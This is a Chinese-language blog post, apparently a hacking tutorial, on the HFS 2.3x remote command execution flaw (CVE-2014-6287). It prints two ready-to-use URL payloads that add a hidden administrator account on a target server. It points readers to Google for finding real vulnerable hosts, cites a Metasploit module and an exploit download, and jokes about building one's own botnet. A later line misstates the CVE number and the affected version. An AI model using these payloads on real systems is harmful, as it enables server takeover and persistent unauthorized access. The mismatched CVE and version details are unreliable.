回顾HFS 2.3x 远程命令执行,抓鸡黑客的“末日”(CVE2014-6287)

    去年HFS 2.3x 远程命令执行让很多人遭殃了，尤其是一部分黑客，因为很多批量养鸡的黑客都爱用它，于是乎，辛辛苦苦抓的肉鸡就与人分享了。我们分析漏洞得知由于正则表达式的问题，导致了远程代码的执行。

    下面我们来本地测试一下这个漏洞的威力，为什么过了大半年还提它？因为今天随便搜了一下，用这个版本的国内还有很多，涉及到部分“抓鸡黑客”(现在还在用这个版本的估计是小菜)，学校等。有趣的是，用hfs的服务器一般都开启了3389，罪恶啊。如下图。

    

google上可以搜到更多的主机。

 

随便测试几个，大部分开启了3389端口。导致服务器非常不安全。

 

        下面我们在本地虚拟机进行测试，模拟一个“抓鸡黑客”的主机。访问目标网址，发现里面有一个muma.exe，一般是用来挂网马用的。该实例由真实案例改编。

    

    然后利用下面的exp，即可在目标主机上添加管理员账户，然后远程登陆。  

    http://192.168.72.144:8080/?search==%00{.exec|cmd.exe /c net user zerosecurity 12345 /add.}

    http://192.168.72.144:8080/?search==%00{.exec|cmd.exe /c net localgroup administrators zerosecurity /add.}

    Tip:有些版本search前面没有?，使用时自己试一下搜索框即可。

 

    登陆远程桌面后可以看到，查看管理员账户成功添加。

 

        同时我们可以看到，该“黑客”的肉鸡也沦陷到我们手上。

 

    metasploit也有对应的exp模块，这里不细说，有兴趣的朋友可以自己尝试一下。

    利用模块：exploit/windows/http/rejetto_hfs_exec
    影响版本： HFS 2.37
    CVE:  CVE-2014-62876
    触发平台：windows

    EXP下载:点我点我

    

    什么？你也想打造自己的养鸡场？以后再说咯~